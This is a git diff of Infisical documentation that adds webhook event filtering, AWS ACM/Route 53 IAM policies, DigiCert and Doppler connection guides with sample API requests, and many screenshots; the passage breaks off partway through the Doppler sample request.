b/docs/documentation/platform/webhooks.mdx index 924dda87a7f..61534953225 100644 --- a/docs/documentation/platform/webhooks.mdx +++ b/docs/documentation/platform/webhooks.mdx @@ -23,6 +23,15 @@ The header will be in the format `t=;`. You can then gener If the signature in the header matches the signature that you generated, then you can be sure that the request was sent by Infisical and is intended for your integration. The timestamp in the header ensures that the request is not replayed. +## Event Filtering + +By default, webhooks trigger on every supported event. You can narrow this down under **Advanced Settings** when creating a webhook, and only receive the events you care about. You can also change the events on existing webhooks by clicking **Edit** and selecting the events you want. + +Supported events: + +- **Secret Modified** (`secrets.modified`) β€” triggered when secrets in the configured scope are created, updated, or deleted. +- **Secret Rotation Failed** (`secrets.rotation-failed`) β€” triggered when a secret rotation in the configured scope fails. + ### Webhook Payload Format ```json @@ -39,20 +48,6 @@ If the signature in the header matches the signature that you generated, then yo } ``` -```json -{ - "event": "secrets.reminder-expired", - "project": { - "workspaceId": "the workspace id", - "environment": "project environment", - "secretPath": "project folder path", - "secretName": "name of the secret", - "secretId": "id of the secret", - "reminderNote": "reminder note of the secret" - }, - "timestamp": "" -} -``` ```json { diff --git a/docs/images/app-connections/digicert/add-connection.png b/docs/images/app-connections/digicert/add-connection.png new file mode 100644 index 00000000000..e6347f62b1f Binary files /dev/null and b/docs/images/app-connections/digicert/add-connection.png differ diff --git a/docs/images/app-connections/digicert/digicert-app-connection-created.png b/docs/images/app-connections/digicert/digicert-app-connection-created.png new file mode 100644 index 00000000000..106b3900e66 Binary files /dev/null and b/docs/images/app-connections/digicert/digicert-app-connection-created.png differ diff --git a/docs/images/app-connections/digicert/digicert-app-connection-form.png b/docs/images/app-connections/digicert/digicert-app-connection-form.png new file mode 100644 index 00000000000..37fd99b71d8 Binary files /dev/null and b/docs/images/app-connections/digicert/digicert-app-connection-form.png differ diff --git a/docs/images/app-connections/digicert/digicert-app-connection-option.png b/docs/images/app-connections/digicert/digicert-app-connection-option.png new file mode 100644 index 00000000000..5be60c196a1 Binary files /dev/null and b/docs/images/app-connections/digicert/digicert-app-connection-option.png differ diff --git a/docs/images/app-connections/digicert/step-1.png b/docs/images/app-connections/digicert/step-1.png new file mode 100644 index 00000000000..9898c9e89bb Binary files /dev/null and b/docs/images/app-connections/digicert/step-1.png differ diff --git a/docs/images/app-connections/digicert/step-2.png b/docs/images/app-connections/digicert/step-2.png new file mode 100644 index 00000000000..e5e71e0bb34 Binary files /dev/null and b/docs/images/app-connections/digicert/step-2.png differ diff --git a/docs/images/app-connections/doppler/copy-the-generated-code.png b/docs/images/app-connections/doppler/copy-the-generated-code.png new file mode 100644 index 00000000000..89736b87ff2 Binary files /dev/null and b/docs/images/app-connections/doppler/copy-the-generated-code.png differ diff --git a/docs/images/app-connections/doppler/create-api-token.png b/docs/images/app-connections/doppler/create-api-token.png new file mode 100644 index 00000000000..30c0695d814 Binary files /dev/null and b/docs/images/app-connections/doppler/create-api-token.png differ diff --git a/docs/images/app-connections/doppler/doppler-app-connection-created.png b/docs/images/app-connections/doppler/doppler-app-connection-created.png new file mode 100644 index 00000000000..e969cb4aa2b Binary files /dev/null and b/docs/images/app-connections/doppler/doppler-app-connection-created.png differ diff --git a/docs/images/app-connections/doppler/doppler-app-connection-form.png b/docs/images/app-connections/doppler/doppler-app-connection-form.png new file mode 100644 index 00000000000..1074fd32af0 Binary files /dev/null and b/docs/images/app-connections/doppler/doppler-app-connection-form.png differ diff --git a/docs/images/app-connections/doppler/doppler-app-connection-option.png b/docs/images/app-connections/doppler/doppler-app-connection-option.png new file mode 100644 index 00000000000..a0982bf7223 Binary files /dev/null and b/docs/images/app-connections/doppler/doppler-app-connection-option.png differ diff --git a/docs/images/app-connections/doppler/doppler-create-service-account.png b/docs/images/app-connections/doppler/doppler-create-service-account.png new file mode 100644 index 00000000000..858ebcc7040 Binary files /dev/null and b/docs/images/app-connections/doppler/doppler-create-service-account.png differ diff --git a/docs/images/app-connections/doppler/doppler-dashboard.png b/docs/images/app-connections/doppler/doppler-dashboard.png new file mode 100644 index 00000000000..cc1a50a90a2 Binary files /dev/null and b/docs/images/app-connections/doppler/doppler-dashboard.png differ diff --git a/docs/images/app-connections/doppler/doppler-service-account-configure-role.png b/docs/images/app-connections/doppler/doppler-service-account-configure-role.png new file mode 100644 index 00000000000..fa956f6176e Binary files /dev/null and b/docs/images/app-connections/doppler/doppler-service-account-configure-role.png differ diff --git a/docs/images/app-connections/doppler/doppler-service-account-select-role.png b/docs/images/app-connections/doppler/doppler-service-account-select-role.png new file mode 100644 index 00000000000..b23e25dc2f9 Binary files /dev/null and b/docs/images/app-connections/doppler/doppler-service-account-select-role.png differ diff --git a/docs/images/app-connections/doppler/manage-service-accounts.png b/docs/images/app-connections/doppler/manage-service-accounts.png new file mode 100644 index 00000000000..f02f4b66047 Binary files /dev/null and b/docs/images/app-connections/doppler/manage-service-accounts.png differ diff --git a/docs/images/app-connections/doppler/service-account-api-token-creation.png b/docs/images/app-connections/doppler/service-account-api-token-creation.png new file mode 100644 index 00000000000..3004d7888f9 Binary files /dev/null and b/docs/images/app-connections/doppler/service-account-api-token-creation.png differ diff --git a/docs/images/app-connections/ona/ona-access-token-tab.png b/docs/images/app-connections/ona/ona-access-token-tab.png new file mode 100644 index 00000000000..8d232380e08 Binary files /dev/null and b/docs/images/app-connections/ona/ona-access-token-tab.png differ diff --git a/docs/images/app-connections/ona/ona-account-settings.png b/docs/images/app-connections/ona/ona-account-settings.png new file mode 100644 index 00000000000..17530a7796d Binary files /dev/null and b/docs/images/app-connections/ona/ona-account-settings.png differ diff --git a/docs/images/app-connections/ona/ona-app-connection-form.png b/docs/images/app-connections/ona/ona-app-connection-form.png new file mode 100644 index 00000000000..9530b81d29c Binary files /dev/null and b/docs/images/app-connections/ona/ona-app-connection-form.png differ diff --git a/docs/images/app-connections/ona/ona-app-connection-generated.png b/docs/images/app-connections/ona/ona-app-connection-generated.png new file mode 100644 index 00000000000..91044948a59 Binary files /dev/null and b/docs/images/app-connections/ona/ona-app-connection-generated.png differ diff --git a/docs/images/app-connections/ona/ona-app-connection-option.png b/docs/images/app-connections/ona/ona-app-connection-option.png new file mode 100644 index 00000000000..6edabc49de7 Binary files /dev/null and b/docs/images/app-connections/ona/ona-app-connection-option.png differ diff --git a/docs/images/app-connections/ona/ona-pat-copy.png b/docs/images/app-connections/ona/ona-pat-copy.png new file mode 100644 index 00000000000..57025a976e9 Binary files /dev/null and b/docs/images/app-connections/ona/ona-pat-copy.png differ diff --git a/docs/images/app-connections/ona/ona-pat-creation-modal.png b/docs/images/app-connections/ona/ona-pat-creation-modal.png new file mode 100644 index 00000000000..16c2b351ed7 Binary files /dev/null and b/docs/images/app-connections/ona/ona-pat-creation-modal.png differ diff --git a/docs/images/app-connections/ona/ona-pat-section.png b/docs/images/app-connections/ona/ona-pat-section.png new file mode 100644 index 00000000000..d821e671c41 Binary files /dev/null and b/docs/images/app-connections/ona/ona-pat-section.png differ diff --git a/docs/images/app-connections/travis-ci/travis-ci-app-connection-modal.png b/docs/images/app-connections/travis-ci/travis-ci-app-connection-modal.png new file mode 100644 index 00000000000..62cb11a9f1e Binary files /dev/null and b/docs/images/app-connections/travis-ci/travis-ci-app-connection-modal.png differ diff --git a/docs/images/app-connections/travis-ci/travis-ci-app-connection-option.png b/docs/images/app-connections/travis-ci/travis-ci-app-connection-option.png new file mode 100644 index 00000000000..d387b59c051 Binary files /dev/null and b/docs/images/app-connections/travis-ci/travis-ci-app-connection-option.png differ diff --git a/docs/images/app-connections/travis-ci/travis-ci-copy-token.png b/docs/images/app-connections/travis-ci/travis-ci-copy-token.png new file mode 100644 index 00000000000..38f9879c723 Binary files /dev/null and b/docs/images/app-connections/travis-ci/travis-ci-copy-token.png differ diff --git a/docs/images/platform/external-migrations/doppler-in-platform/doppler-connection-modal.png b/docs/images/platform/external-migrations/doppler-in-platform/doppler-connection-modal.png new file mode 100644 index 00000000000..9beb04a1a94 Binary files /dev/null and b/docs/images/platform/external-migrations/doppler-in-platform/doppler-connection-modal.png differ diff --git a/docs/images/platform/external-migrations/doppler-in-platform/import-doppler-secret-overview-modal.png b/docs/images/platform/external-migrations/doppler-in-platform/import-doppler-secret-overview-modal.png new file mode 100644 index 00000000000..6d3e77840ab Binary files /dev/null and b/docs/images/platform/external-migrations/doppler-in-platform/import-doppler-secret-overview-modal.png differ diff --git a/docs/images/platform/external-migrations/doppler-in-platform/import-doppler-secret-overview-option.png b/docs/images/platform/external-migrations/doppler-in-platform/import-doppler-secret-overview-option.png new file mode 100644 index 00000000000..456d7491f6d Binary files /dev/null and b/docs/images/platform/external-migrations/doppler-in-platform/import-doppler-secret-overview-option.png differ diff --git a/docs/images/platform/external-migrations/doppler-in-platform/select-doppler-provider.png b/docs/images/platform/external-migrations/doppler-in-platform/select-doppler-provider.png new file mode 100644 index 00000000000..fa08408f2f9 Binary files /dev/null and b/docs/images/platform/external-migrations/doppler-in-platform/select-doppler-provider.png differ diff --git a/docs/images/platform/external-migrations/vault-in-platform/import-vault-secrets-modal.png b/docs/images/platform/external-migrations/vault-in-platform/import-vault-secrets-modal.png index 3bfe6428b46..80ee2f56cdb 100644 Binary files a/docs/images/platform/external-migrations/vault-in-platform/import-vault-secrets-modal.png and b/docs/images/platform/external-migrations/vault-in-platform/import-vault-secrets-modal.png differ diff --git a/docs/images/platform/external-migrations/vault-in-platform/namespace-configuration-modal.png b/docs/images/platform/external-migrations/vault-in-platform/namespace-configuration-modal.png index 828b825445d..a9c04667cd6 100644 Binary files a/docs/images/platform/external-migrations/vault-in-platform/namespace-configuration-modal.png and b/docs/images/platform/external-migrations/vault-in-platform/namespace-configuration-modal.png differ diff --git a/docs/images/platform/external-migrations/vault-in-platform/select-migration-provider.png b/docs/images/platform/external-migrations/vault-in-platform/select-migration-provider.png new file mode 100644 index 00000000000..a95e2775f57 Binary files /dev/null and b/docs/images/platform/external-migrations/vault-in-platform/select-migration-provider.png differ diff --git a/docs/images/platform/gateways/gateway-create-button.png b/docs/images/platform/gateways/gateway-create-button.png new file mode 100644 index 00000000000..df34e314dfc Binary files /dev/null and b/docs/images/platform/gateways/gateway-create-button.png differ diff --git a/docs/images/platform/gateways/gateway-create-form.png b/docs/images/platform/gateways/gateway-create-form.png new file mode 100644 index 00000000000..821764b10f5 Binary files /dev/null and b/docs/images/platform/gateways/gateway-create-form.png differ diff --git a/docs/images/platform/gateways/gateway-pools-add-gateway.png b/docs/images/platform/gateways/gateway-pools-add-gateway.png new file mode 100644 index 00000000000..e6e2fb8eeeb Binary files /dev/null and b/docs/images/platform/gateways/gateway-pools-add-gateway.png differ diff --git a/docs/images/platform/gateways/gateway-pools-click-pool.png b/docs/images/platform/gateways/gateway-pools-click-pool.png new file mode 100644 index 00000000000..8025414ba29 Binary files /dev/null and b/docs/images/platform/gateways/gateway-pools-click-pool.png differ diff --git a/docs/images/platform/gateways/gateway-pools-create.png b/docs/images/platform/gateways/gateway-pools-create.png new file mode 100644 index 00000000000..b07487d15fd Binary files /dev/null and b/docs/images/platform/gateways/gateway-pools-create.png differ diff --git a/docs/images/platform/gateways/gateway-pools-switch.png b/docs/images/platform/gateways/gateway-pools-switch.png new file mode 100644 index 00000000000..1d055219a87 Binary files /dev/null and b/docs/images/platform/gateways/gateway-pools-switch.png differ diff --git a/docs/images/platform/gateways/gateway-pools-tab.png b/docs/images/platform/gateways/gateway-pools-tab.png new file mode 100644 index 00000000000..4742bde4634 Binary files /dev/null and b/docs/images/platform/gateways/gateway-pools-tab.png differ diff --git a/docs/images/platform/pki/aws-acm-public-ca/aws-acm-public-ca-certificate-created.png b/docs/images/platform/pki/aws-acm-public-ca/aws-acm-public-ca-certificate-created.png new file mode 100644 index 00000000000..0d7fd1cf6db Binary files /dev/null and b/docs/images/platform/pki/aws-acm-public-ca/aws-acm-public-ca-certificate-created.png differ diff --git a/docs/images/platform/pki/aws-acm-public-ca/aws-acm-public-ca-copy-hosted-zone-id.png b/docs/images/platform/pki/aws-acm-public-ca/aws-acm-public-ca-copy-hosted-zone-id.png new file mode 100644 index 00000000000..2a53da8ce82 Binary files /dev/null and b/docs/images/platform/pki/aws-acm-public-ca/aws-acm-public-ca-copy-hosted-zone-id.png differ diff --git a/docs/images/platform/pki/aws-acm-public-ca/aws-acm-public-ca-external-ca-form.png b/docs/images/platform/pki/aws-acm-public-ca/aws-acm-public-ca-external-ca-form.png new file mode 100644 index 00000000000..5d1da518222 Binary files /dev/null and b/docs/images/platform/pki/aws-acm-public-ca/aws-acm-public-ca-external-ca-form.png differ diff --git a/docs/images/platform/pki/aws-acm-public-ca/aws-acm-public-ca-external-ca-page.png b/docs/images/platform/pki/aws-acm-public-ca/aws-acm-public-ca-external-ca-page.png new file mode 100644 index 00000000000..640aecf55a6 Binary files /dev/null and b/docs/images/platform/pki/aws-acm-public-ca/aws-acm-public-ca-external-ca-page.png differ diff --git a/docs/images/platform/pki/digicert/digicert-external-ca-form.png b/docs/images/platform/pki/digicert/digicert-external-ca-form.png new file mode 100644 index 00000000000..3f2702e9ba5 Binary files /dev/null and b/docs/images/platform/pki/digicert/digicert-external-ca-form.png differ diff --git a/docs/images/platform/pki/integrations/jamf-pro/jamf-webhook-config.png b/docs/images/platform/pki/integrations/jamf-pro/jamf-webhook-config.png new file mode 100644 index 00000000000..1169a466b8b Binary files /dev/null and b/docs/images/platform/pki/integrations/jamf-pro/jamf-webhook-config.png differ diff --git a/docs/images/platform/pki/integrations/jamf-pro/scep-config-challenge-dynamic.png b/docs/images/platform/pki/integrations/jamf-pro/scep-config-challenge-dynamic.png new file mode 100644 index 00000000000..c6023bbec59 Binary files /dev/null and b/docs/images/platform/pki/integrations/jamf-pro/scep-config-challenge-dynamic.png differ diff --git a/docs/images/platform/pki/venafi-tpp/venafi-tpp-certificate-created.png b/docs/images/platform/pki/venafi-tpp/venafi-tpp-certificate-created.png new file mode 100644 index 00000000000..5bccade9615 Binary files /dev/null and b/docs/images/platform/pki/venafi-tpp/venafi-tpp-certificate-created.png differ diff --git a/docs/images/platform/pki/venafi-tpp/venafi-tpp-external-ca-created.png b/docs/images/platform/pki/venafi-tpp/venafi-tpp-external-ca-created.png new file mode 100644 index 00000000000..a2f85de95a8 Binary files /dev/null and b/docs/images/platform/pki/venafi-tpp/venafi-tpp-external-ca-created.png differ diff --git a/docs/images/platform/pki/venafi-tpp/venafi-tpp-external-ca-form.png b/docs/images/platform/pki/venafi-tpp/venafi-tpp-external-ca-form.png new file mode 100644 index 00000000000..0b69a145cb9 Binary files /dev/null and b/docs/images/platform/pki/venafi-tpp/venafi-tpp-external-ca-form.png differ diff --git a/docs/images/platform/pki/venafi-tpp/venafi-tpp-external-ca-page.png b/docs/images/platform/pki/venafi-tpp/venafi-tpp-external-ca-page.png new file mode 100644 index 00000000000..51efa9e6e58 Binary files /dev/null and b/docs/images/platform/pki/venafi-tpp/venafi-tpp-external-ca-page.png differ diff --git a/docs/images/secret-rotations-v2/generic/add-secret-rotation.png b/docs/images/secret-rotations-v2/generic/add-secret-rotation.png index 4b1b626ae23..d8c1867d5c7 100644 Binary files a/docs/images/secret-rotations-v2/generic/add-secret-rotation.png and b/docs/images/secret-rotations-v2/generic/add-secret-rotation.png differ diff --git a/docs/images/secret-rotations-v2/supabase-api-key/configuration.png b/docs/images/secret-rotations-v2/supabase-api-key/configuration.png new file mode 100644 index 00000000000..2ef726bd2de Binary files /dev/null and b/docs/images/secret-rotations-v2/supabase-api-key/configuration.png differ diff --git a/docs/images/secret-rotations-v2/supabase-api-key/created.png b/docs/images/secret-rotations-v2/supabase-api-key/created.png new file mode 100644 index 00000000000..623bbf4edc4 Binary files /dev/null and b/docs/images/secret-rotations-v2/supabase-api-key/created.png differ diff --git a/docs/images/secret-rotations-v2/supabase-api-key/details.png b/docs/images/secret-rotations-v2/supabase-api-key/details.png new file mode 100644 index 00000000000..2935b46a8a9 Binary files /dev/null and b/docs/images/secret-rotations-v2/supabase-api-key/details.png differ diff --git a/docs/images/secret-rotations-v2/supabase-api-key/parameters.png b/docs/images/secret-rotations-v2/supabase-api-key/parameters.png new file mode 100644 index 00000000000..798c17dfec6 Binary files /dev/null and b/docs/images/secret-rotations-v2/supabase-api-key/parameters.png differ diff --git a/docs/images/secret-rotations-v2/supabase-api-key/review.png b/docs/images/secret-rotations-v2/supabase-api-key/review.png new file mode 100644 index 00000000000..ae76a817f48 Binary files /dev/null and b/docs/images/secret-rotations-v2/supabase-api-key/review.png differ diff --git a/docs/images/secret-rotations-v2/supabase-api-key/secrets-mapping.png b/docs/images/secret-rotations-v2/supabase-api-key/secrets-mapping.png new file mode 100644 index 00000000000..8adc0ca9dfd Binary files /dev/null and b/docs/images/secret-rotations-v2/supabase-api-key/secrets-mapping.png differ diff --git a/docs/images/secret-rotations-v2/supabase-api-key/select-supabase-api-key.png b/docs/images/secret-rotations-v2/supabase-api-key/select-supabase-api-key.png new file mode 100644 index 00000000000..baba82fcbf9 Binary files /dev/null and b/docs/images/secret-rotations-v2/supabase-api-key/select-supabase-api-key.png differ diff --git a/docs/images/secret-syncs/ona/ona-created.png b/docs/images/secret-syncs/ona/ona-created.png new file mode 100644 index 00000000000..91044948a59 Binary files /dev/null and b/docs/images/secret-syncs/ona/ona-created.png differ diff --git a/docs/images/secret-syncs/ona/ona-destination.png b/docs/images/secret-syncs/ona/ona-destination.png new file mode 100644 index 00000000000..875d9a7f8d0 Binary files /dev/null and b/docs/images/secret-syncs/ona/ona-destination.png differ diff --git a/docs/images/secret-syncs/ona/ona-details.png b/docs/images/secret-syncs/ona/ona-details.png new file mode 100644 index 00000000000..6c3c0bec414 Binary files /dev/null and b/docs/images/secret-syncs/ona/ona-details.png differ diff --git a/docs/images/secret-syncs/ona/ona-options.png b/docs/images/secret-syncs/ona/ona-options.png new file mode 100644 index 00000000000..0bc474d810c Binary files /dev/null and b/docs/images/secret-syncs/ona/ona-options.png differ diff --git a/docs/images/secret-syncs/ona/ona-review.png b/docs/images/secret-syncs/ona/ona-review.png new file mode 100644 index 00000000000..0b76ed87fac Binary files /dev/null and b/docs/images/secret-syncs/ona/ona-review.png differ diff --git a/docs/images/secret-syncs/ona/ona-source.png b/docs/images/secret-syncs/ona/ona-source.png new file mode 100644 index 00000000000..9c4481fe308 Binary files /dev/null and b/docs/images/secret-syncs/ona/ona-source.png differ diff --git a/docs/images/secret-syncs/ona/select-ona-option.png b/docs/images/secret-syncs/ona/select-ona-option.png new file mode 100644 index 00000000000..980c85edf7e Binary files /dev/null and b/docs/images/secret-syncs/ona/select-ona-option.png differ diff --git a/docs/images/secret-syncs/travis-ci/select-travis-ci-option.png b/docs/images/secret-syncs/travis-ci/select-travis-ci-option.png new file mode 100644 index 00000000000..08efa4864d1 Binary files /dev/null and b/docs/images/secret-syncs/travis-ci/select-travis-ci-option.png differ diff --git a/docs/images/secret-syncs/travis-ci/travis-ci-created.png b/docs/images/secret-syncs/travis-ci/travis-ci-created.png new file mode 100644 index 00000000000..b790d682902 Binary files /dev/null and b/docs/images/secret-syncs/travis-ci/travis-ci-created.png differ diff --git a/docs/images/secret-syncs/travis-ci/travis-ci-destination.png b/docs/images/secret-syncs/travis-ci/travis-ci-destination.png new file mode 100644 index 00000000000..2ee9811707a Binary files /dev/null and b/docs/images/secret-syncs/travis-ci/travis-ci-destination.png differ diff --git a/docs/images/secret-syncs/travis-ci/travis-ci-details.png b/docs/images/secret-syncs/travis-ci/travis-ci-details.png new file mode 100644 index 00000000000..2416613df95 Binary files /dev/null and b/docs/images/secret-syncs/travis-ci/travis-ci-details.png differ diff --git a/docs/images/secret-syncs/travis-ci/travis-ci-options.png b/docs/images/secret-syncs/travis-ci/travis-ci-options.png new file mode 100644 index 00000000000..333eb96710e Binary files /dev/null and b/docs/images/secret-syncs/travis-ci/travis-ci-options.png differ diff --git a/docs/images/secret-syncs/travis-ci/travis-ci-review.png b/docs/images/secret-syncs/travis-ci/travis-ci-review.png new file mode 100644 index 00000000000..e9861c8dc9d Binary files /dev/null and b/docs/images/secret-syncs/travis-ci/travis-ci-review.png differ diff --git a/docs/images/secret-syncs/travis-ci/travis-ci-source.png b/docs/images/secret-syncs/travis-ci/travis-ci-source.png new file mode 100644 index 00000000000..dbdb1e1d4e7 Binary files /dev/null and b/docs/images/secret-syncs/travis-ci/travis-ci-source.png differ diff --git a/docs/images/self-hosting/helper/upgrade-path-tool.png b/docs/images/self-hosting/helper/upgrade-path-tool.png deleted file mode 100644 index a8a538aaf40..00000000000 Binary files a/docs/images/self-hosting/helper/upgrade-path-tool.png and /dev/null differ diff --git a/docs/integrations/app-connections/aws.mdx b/docs/integrations/app-connections/aws.mdx index acbdc78a4ed..6ad1e305e01 100644 --- a/docs/integrations/app-connections/aws.mdx +++ b/docs/integrations/app-connections/aws.mdx @@ -331,6 +331,67 @@ Infisical supports two methods for connecting to AWS. Using a specific CA ARN in `Resource` is recommended over `"*"` to follow the principle of least privilege. + + Use the following custom policy to grant the minimum permissions required by Infisical to issue publicly-trusted certificates via AWS Certificate Manager and perform DNS validation through Route 53. + + **ACM permissions** β€” `RequestCertificate` cannot be scoped below `"*"` because the certificate ARN does not exist until after the call succeeds: + + ```json + { + "Version": "2012-10-17", + "Statement": [ + { + "Sid": "AllowAcmPublicCaAccess", + "Effect": "Allow", + "Action": [ + "acm:RequestCertificate", + "acm:DescribeCertificate", + "acm:ExportCertificate", + "acm:RenewCertificate", + "acm:RevokeCertificate", + "acm:ListCertificates" + ], + "Resource": "*" + } + ] + } + ``` + + **Route 53 permissions** β€” scope to the hosted zone(s) used for DNS validation: + + ```json + { + "Version": "2012-10-17", + "Statement": [ + { + "Sid": "AllowRoute53ForAcmValidation", + "Effect": "Allow", + "Action": [ + "route53:GetHostedZone", + "route53:ChangeResourceRecordSets" + ], + "Resource": "arn:aws:route53:::hostedzone/YOUR_HOSTED_ZONE_ID" + } + ] + } + ``` + + ACM and Route 53 permissions can live on the same IAM principal, or be split across two separate connections in Infisical. + + + **ACM Permissions:** + - **RequestCertificate**: Requests a new public certificate from ACM + - **DescribeCertificate**: Retrieves certificate status and DNS validation records + - **ExportCertificate**: Exports the issued certificate and private key to Infisical + - **RenewCertificate**: Triggers renewal of an existing certificate + - **RevokeCertificate**: Revokes a previously issued certificate + - **ListCertificates**: Used during connection validation + + **Route 53 Permissions:** + - **GetHostedZone**: Validates the hosted zone during CA setup + - **ChangeResourceRecordSets**: Writes the ACM DNS validation CNAME records + + @@ -662,6 +723,67 @@ Infisical supports two methods for connecting to AWS. Using a specific CA ARN in `Resource` is recommended over `"*"` to follow the principle of least privilege. + + Use the following custom policy to grant the minimum permissions required by Infisical to issue publicly-trusted certificates via AWS Certificate Manager and perform DNS validation through Route 53. + + **ACM permissions** β€” `RequestCertificate` cannot be scoped below `"*"` because the certificate ARN does not exist until after the call succeeds: + + ```json + { + "Version": "2012-10-17", + "Statement": [ + { + "Sid": "AllowAcmPublicCaAccess", + "Effect": "Allow", + "Action": [ + "acm:RequestCertificate", + "acm:DescribeCertificate", + "acm:ExportCertificate", + "acm:RenewCertificate", + "acm:RevokeCertificate", + "acm:ListCertificates" + ], + "Resource": "*" + } + ] + } + ``` + + **Route 53 permissions** β€” scope to the hosted zone(s) used for DNS validation: + + ```json + { + "Version": "2012-10-17", + "Statement": [ + { + "Sid": "AllowRoute53ForAcmValidation", + "Effect": "Allow", + "Action": [ + "route53:GetHostedZone", + "route53:ChangeResourceRecordSets" + ], + "Resource": "arn:aws:route53:::hostedzone/YOUR_HOSTED_ZONE_ID" + } + ] + } + ``` + + ACM and Route 53 permissions can live on the same IAM principal, or be split across two separate connections in Infisical. + + + **ACM Permissions:** + - **RequestCertificate**: Requests a new public certificate from ACM + - **DescribeCertificate**: Retrieves certificate status and DNS validation records + - **ExportCertificate**: Exports the issued certificate and private key to Infisical + - **RenewCertificate**: Triggers renewal of an existing certificate + - **RevokeCertificate**: Revokes a previously issued certificate + - **ListCertificates**: Used during connection validation + + **Route 53 Permissions:** + - **GetHostedZone**: Validates the hosted zone during CA setup + - **ChangeResourceRecordSets**: Writes the ACM DNS validation CNAME records + + diff --git a/docs/integrations/app-connections/digicert.mdx b/docs/integrations/app-connections/digicert.mdx new file mode 100644 index 00000000000..b249c5974b8 --- /dev/null +++ b/docs/integrations/app-connections/digicert.mdx @@ -0,0 +1,116 @@ +--- +title: "DigiCert Connection" +description: "Learn how to configure a DigiCert connection for Infisical." +--- + +Infisical supports connecting to [DigiCert CertCentral](https://dev.digicert.com/en/certcentral-apis.html) using a **CertCentral API Key**. This connection powers the [DigiCert Certificate Authority](/documentation/platform/pki/ca/digicert-direct) for direct (non-ACME) certificate issuance. + + + This connection is for the DigiCert **CertCentral Services API**. If you are using DigiCert's + ACME endpoint with External Account Binding (EAB) credentials, use the + [ACME Certificate Authority](/documentation/platform/pki/ca/acme-ca) instead. + + +## Prerequisites + +- A CertCentral account with sufficient permissions to create API keys and place certificate orders +- At least one validated CertCentral organization that will be listed on issued certificates +- A CertCentral user with a role that can place and manage orders (typically **Manager** or **Administrator**) β€” the API key inherits its permissions from this user + +## Create a CertCentral API Key + + + + In your CertCentral account, go to **Automation** β†’ **API Keys** and click **Add API Key**. + + ![CertCentral API Keys](/images/app-connections/digicert/step-1.png) + + + Give the key a descriptive name (e.g. `infisical`) and **assign a user whose role is Manager or Administrator**, the key inherits that user's permissions on CertCentral. + + Under **API key restrictions**, leave the default **None** or select **Orders, Domains, Organizations** + + Copy the generated key value, it is only shown once. + + ![CertCentral Create Key](/images/app-connections/digicert/step-2.png) + + + + + Create a dedicated API key for Infisical rather than reusing an existing one so you can rotate or + revoke access independently. + + +## Create DigiCert Connection in Infisical + + + + + + In your Infisical dashboard, go to **Organization Settings** β†’ **App Connections**. + + ![App Connections Tab](/images/app-connections/general/add-connection.png) + + + Click **Add Connection** and choose **DigiCert** from the list of available connections. + + ![Select DigiCert Connection](/images/app-connections/digicert/digicert-app-connection-option.png) + + + Complete the form with: + - A **name** for the connection (e.g. `digicert-prod`) + - An optional **description** + - The **CertCentral Region** matching your account, **US** or **EU** + - Your **CertCentral API Key** + + ![DigiCert Connection Form](/images/app-connections/digicert/digicert-app-connection-form.png) + + + After clicking **Create**, Infisical validates the key by calling + `GET /services/v2/organization`. Once the key is confirmed, the connection is ready to use + in a DigiCert Certificate Authority. + + ![DigiCert Connection Created](/images/app-connections/digicert/digicert-app-connection-created.png) + + + + + To create a DigiCert Connection, make an API request to the [Create DigiCert Connection](/api-reference/endpoints/app-connections/digicert/create) API endpoint. + + ### Sample request + + ```bash Request + curl --request POST \ + --url https://app.infisical.com/api/v1/app-connections/digicert \ + --header 'Content-Type: application/json' \ + --data '{ + "name": "my-digicert-connection", + "method": "api-key", + "credentials": { + "apiKey": "", + "region": "us" + } + }' + ``` + + ### Sample response + + ```bash Response + { + "appConnection": { + "id": "a1b2c3d4-86f7-4026-a95e-efb8aeb0d8e6", + "name": "my-digicert-connection", + "description": null, + "version": 1, + "orgId": "6f03caa1-a5de-43ce-b127-95a145d3464c", + "createdAt": "2026-04-20T00:00:00.000Z", + "updatedAt": "2026-04-20T00:00:00.000Z", + "isPlatformManagedCredentials": false, + "app": "digicert", + "method": "api-key", + "credentials": {} + } + } + ``` + + diff --git a/docs/integrations/app-connections/doppler.mdx b/docs/integrations/app-connections/doppler.mdx new file mode 100644 index 00000000000..91e228028b7 --- /dev/null +++ b/docs/integrations/app-connections/doppler.mdx @@ -0,0 +1,125 @@ +--- +title: "Doppler Connection" +description: "Learn how to configure a Doppler Connection for Infisical." +--- + +Infisical supports the use of API Tokens to connect with Doppler. This connection is used for importing secrets from Doppler into Infisical via the [external migration tool](/documentation/platform/external-migrations/doppler). + +## Create a Doppler API Token + + + + Log in to your Doppler account and go to the Tokens tab. + + ![Doppler Dashboard](/images/app-connections/doppler/doppler-dashboard.png) + + + In the User Tokens page, click in **Manage service accounts** . + + ![Doppler Service Accounts](/images/app-connections/doppler/manage-service-accounts.png) + + + Click in the "+" icon, provide a descriptive name, and confirm creation. + + ![Doppler Create Token](/images/app-connections/doppler/doppler-create-service-account.png) + + + Click the pencil icon next to your service account role to modify the role of the service account. + ![Doppler Service Account Role](/images/app-connections/doppler/doppler-service-account-select-role.png) + + + For the best migration experience, we recommend that you give the service account full access to all your projects in order to migrate from all projects within Doppler. + + ![Doppler Service Account Role](/images/app-connections/doppler/doppler-service-account-configure-role.png) + + + + Click in the "+" icon in the Service Account API Tokens container + + ![Doppler Token Created](/images/app-connections/doppler/service-account-api-token-creation.png) + + + Add a name for the API Token and click in Create API Token + + ![Doppler Token Created](/images/app-connections/doppler/create-api-token.png) + + + Copy the generated token and save it, you will need it in the nexts steps + + ![Doppler Token Created](/images/app-connections/doppler/copy-the-generated-code.png) + + + +## Create a Doppler Connection in Infisical + + + + + + In your Infisical dashboard, navigate to **Organization Settings** and select the **App Connections** tab. + + ![App Connections Tab](/images/app-connections/general/add-connection.png) + + + Click **+ Add Connection** and choose **Doppler Connection** from the list of available connections. + + ![Select Doppler Connection](/images/app-connections/doppler/doppler-app-connection-option.png) + + + Complete the form by providing: + - A descriptive name for the connection + - An optional description + - The API Token value from the previous step + + ![Doppler Connection Form](/images/app-connections/doppler/doppler-app-connection-form.png) + + + After submitting the form, your **Doppler Connection** will be successfully created and ready to use for importing secrets into Infisical. + + ![Doppler Connection Created](/images/app-connections/doppler/doppler-app-connection-created.png) + + + + + + + To create a Doppler Connection via API, send a request to the [Create Doppler Connection](/api-reference/endpoints/app-connections/doppler/create) endpoint. + + ### Sample request + + ```bash Request + curl --request POST \ + --url https://app.infisical.com/api/v1/app-connections/doppler \ + --header 'Content-Type: application/json' \ + --data '{ + "name": "my-doppler-connection", + "method": "api-token", + "credentials": { + "apiToken": 